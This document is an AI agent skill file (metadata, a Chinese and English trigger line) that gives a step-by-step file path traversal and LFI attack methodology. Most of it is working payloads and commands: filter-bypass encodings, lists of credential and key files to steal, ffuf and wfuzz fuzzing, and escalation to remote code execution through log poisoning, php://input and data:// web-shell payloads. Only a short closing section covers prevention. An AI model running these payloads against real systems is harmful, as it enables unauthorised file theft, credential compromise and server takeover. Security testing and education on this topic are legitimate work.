File Path Traversal Testing
当用户询问"测试目录遍历"、"利用路径遍历漏洞"、"通过Web应用读取任意文件"、"发现LFI漏洞"或"访问Web根目录外文件"时,应使用此技能。它提供全面的文件路径遍历攻击与测试方法论。
name:File Path Traversal Testingdescription:This skill should be used when the user asks to "test for directory traversal", "exploit path traversal vulnerabilities", "read arbitrary files through web applications", "find LFI vulnerabilities", or "access files outside web root". It provides comprehensive file path traversal attack and testing methodologies.metadata:author:zebbernversion:"1.1"
File Path Traversal Testing
Purpose
Identify and exploit file path traversal (directory traversal) vulnerabilities that allow attackers to read arbitrary files on the server, potentially including sensitive configuration files, credentials, and source code. This vulnerability occurs when user-controllable input is passed to filesystem APIs without proper validation.
Prerequisites
Required Tools
Required Knowledge
Outputs and Deliverables
Core Workflow
Phase 1: Understanding Path Traversal
Path traversal occurs when applications use user input to construct file paths:
// Vulnerable PHP code example
$template = "blue.php";
if (isset($_COOKIE['template']) && !empty($_COOKIE['template'])) {
$template = $_COOKIE['template'];
}
include("/home/user/templates/" . $template);Attack principle:
../ sequence moves up one directoryImpact:
Phase 2: Identifying Traversal Points
Map application for potential file operations:
# Parameters that often handle files
?file=
?path=
?page=
?template=
?filename=
?doc=
?document=
?folder=
?dir=
?include=
?src=
?source=
?content=
?view=
?download=
?load=
?read=
?retrieve=Common vulnerable functionality:
/image?filename=23.jpg?template=blue.php/download?file=report.pdf/view?doc=manual.pdf?page=aboutPhase 3: Basic Exploitation Techniques
Simple Path Traversal
# Basic Linux traversal
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwdWindows traversal
..\..\..\windows\win.ini
..\..\..\..\windows\system32\drivers\etc\hostsURL encoded
..%2F..%2F..%2Fetc%2Fpasswd
..%252F..%252F..%252Fetc%252Fpasswd # Double encodingTest payloads with curl
curl "http://target.com/image?filename=../../../etc/passwd"
curl "http://target.com/download?file=....//....//....//etc/passwd"Absolute Path Injection
# Direct absolute path (Linux)
/etc/passwd
/etc/shadow
/etc/hosts
/proc/self/environDirect absolute path (Windows)
C:\windows\win.ini
C:\windows\system32\drivers\etc\hosts
C:\boot.iniPhase 4: Bypass Techniques
Bypass Stripped Traversal Sequences
# When ../ is stripped once
....//....//....//etc/passwd
....\/....\/....\/etc/passwdNested traversal
..././..././..././etc/passwd
....//....//etc/passwdMixed encoding
..%2f..%2f..%2fetc/passwd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswdBypass Extension Validation
# Null byte injection (older PHP versions)
../../../etc/passwd%00.jpg
../../../etc/passwd%00.pngPath truncation
../../../etc/passwd...............................Double extension
../../../etc/passwd.jpg.phpBypass Base Directory Validation
# When path must start with expected directory
/var/www/images/../../../etc/passwdExpected path followed by traversal
images/../../../etc/passwdBypass Blacklist Filters
# Unicode/UTF-8 encoding
..%c0%af..%c0%af..%c0%afetc/passwd
..%c1%9c..%c1%9c..%c1%9cetc/passwdOverlong UTF-8 encoding
%c0%2e%c0%2e%c0%afURL encoding variations
%2e%2e/
%2e%2e%5c
..%5c
..%255cCase variations (Windows)
....\\....\\etc\\passwdPhase 5: Linux Target Files
High-value files to target:
# System files
/etc/passwd # User accounts
/etc/shadow # Password hashes (root only)
/etc/group # Group information
/etc/hosts # Host mappings
/etc/hostname # System hostname
/etc/issue # System bannerSSH files
/root/.ssh/id_rsa # Root private key
/root/.ssh/authorized_keys # Authorized keys
/home/<user>/.ssh/id_rsa # User private keys
/etc/ssh/sshd_config # SSH configurationWeb server files
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf
/etc/apache2/sites-enabled/000-default.conf
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.logApplication files
/var/www/html/config.php
/var/www/html/wp-config.php
/var/www/html/.htaccess
/var/www/html/web.configProcess information
/proc/self/environ # Environment variables
/proc/self/cmdline # Process command line
/proc/self/fd/0 # File descriptors
/proc/version # Kernel versionCommon application configs
/etc/mysql/my.cnf
/etc/postgresql/*/postgresql.conf
/opt/lampp/etc/httpd.confPhase 6: Windows Target Files
Windows-specific targets:
# System files
C:\windows\win.ini
C:\windows\system.ini
C:\boot.ini
C:\windows\system32\drivers\etc\hosts
C:\windows\system32\config\SAM
C:\windows\repair\SAMIIS files
C:\inetpub\wwwroot\web.config
C:\inetpub\logs\LogFiles\W3SVC1\Configuration files
C:\xampp\apache\conf\httpd.conf
C:\xampp\mysql\data\mysql\user.MYD
C:\xampp\passwords.txt
C:\xampp\phpmyadmin\config.inc.phpUser files
C:\Users\<user>\.ssh\id_rsa
C:\Users\<user>\Desktop\
C:\Documents and Settings\<user>\Phase 7: Automated Testing
Using Burp Suite
1. Capture request with file parameter
Send to Intruder
Mark file parameter value as payload position
Load path traversal wordlist
Start attack
Filter responses by size/content for success Using ffuf
# Basic traversal fuzzing
ffuf -u "http://target.com/image?filename=FUZZ" \
-w /usr/share/wordlists/traversal.txt \
-mc 200Fuzzing with encoding
ffuf -u "http://target.com/page?file=FUZZ" \
-w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
-mc 200,500 -acUsing wfuzz
# Traverse to /etc/passwd
wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
--hc 404 \
"http://target.com/index.php?file=FUZZ"With headers/cookies
wfuzz -c -z file,traversal.txt \
-H "Cookie: session=abc123" \
"http://target.com/load?path=FUZZ"Phase 8: LFI to RCE Escalation
Log Poisoning
# Inject PHP code into logs
curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/Include Apache log file
curl "http://target.com/page?file=../../../var/log/apache2/access.log&cmd=id"Include auth.log (SSH)
First: ssh '<?php system($_GET["cmd"]); ?>'@target.com
curl "http://target.com/page?file=../../../var/log/auth.log&cmd=whoami"Proc/self/environ
# Inject via User-Agent
curl -A "<?php system('id'); ?>" \
"http://target.com/page?file=/proc/self/environ"With command parameter
curl -A "<?php system(\$_GET['c']); ?>" \
"http://target.com/page?file=/proc/self/environ&c=whoami"PHP Wrapper Exploitation
# php://filter - Read source code as base64
curl "http://target.com/page?file=php://filter/convert.base64-encode/resource=config.php"php://input - Execute POST data as PHP
curl -X POST -d "<?php system('id'); ?>" \
"http://target.com/page?file=php://input"data:// - Execute inline PHP
curl "http://target.com/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==&c=id"expect:// - Execute system commands
curl "http://target.com/page?file=expect://id"Phase 9: Testing Methodology
Structured testing approach:
# Step 1: Identify potential parameters
Look for file-related functionality
Step 2: Test basic traversal
../../../etc/passwdStep 3: Test encoding variations
..%2F..%2F..%2Fetc%2Fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswdStep 4: Test bypass techniques
....//....//....//etc/passwd
..;/..;/..;/etc/passwdStep 5: Test absolute paths
/etc/passwdStep 6: Test with null bytes (legacy)
../../../etc/passwd%00.jpgStep 7: Attempt wrapper exploitation
php://filter/convert.base64-encode/resource=index.phpStep 8: Attempt log poisoning for RCE
Phase 10: Prevention Measures
Secure coding practices:
// PHP: Use basename() to strip paths
$filename = basename($_GET['file']);
$path = "/var/www/files/" . $filename;// PHP: Validate against whitelist
$allowed = ['report.pdf', 'manual.pdf', 'guide.pdf'];
if (in_array($_GET['file'], $allowed)) {
include("/var/www/files/" . $_GET['file']);
}
// PHP: Canonicalize and verify base path
$base = "/var/www/files/";
$realBase = realpath($base);
$userPath = $base . $_GET['file'];
$realUserPath = realpath($userPath);
if ($realUserPath && strpos($realUserPath, $realBase) === 0) {
include($realUserPath);
}
# Python: Use os.path.realpath() and validate
import osdef safe_file_access(base_dir, filename):
# Resolve to absolute path
base = os.path.realpath(base_dir)
file_path = os.path.realpath(os.path.join(base, filename))
# Verify file is within base directory
if file_path.startswith(base):
return open(file_path, 'r').read()
else:
raise Exception("Access denied")
Quick Reference
Common Payloads
| Payload | Target |
|---|---|
../../../etc/passwd | Linux password file |
..\..\..\..\windows\win.ini | Windows INI file |
....//....//....//etc/passwd | Bypass simple filter |
/etc/passwd | Absolute path |
php://filter/convert.base64-encode/resource=config.php | Source code |
Target Files
| OS | File | Purpose |
|---|---|---|
| Linux | /etc/passwd | User accounts |
| Linux | /etc/shadow | Password hashes |
| Linux | /proc/self/environ | Environment vars |
| Windows | C:\windows\win.ini | System config |
| Windows | C:\boot.ini | Boot config |
| Web | wp-config.php | WordPress DB creds |
Encoding Variants
| Type | Example |
|---|---|
| URL Encoding | %2e%2e%2f = ../ |
| Double Encoding | %252e%252e%252f = ../ |
| Unicode | %c0%af = / |
| Null Byte | %00 |
Constraints and Limitations
Permission Restrictions
Application Restrictions
Testing Considerations
Troubleshooting
| Problem | Solutions |
|---|---|
| No response difference | Try encoding, blind traversal, different files |
| Payload blocked | Use encoding variants, nested sequences, case variations |
| Cannot escalate to RCE | Check logs, PHP wrappers, file upload, session poisoning |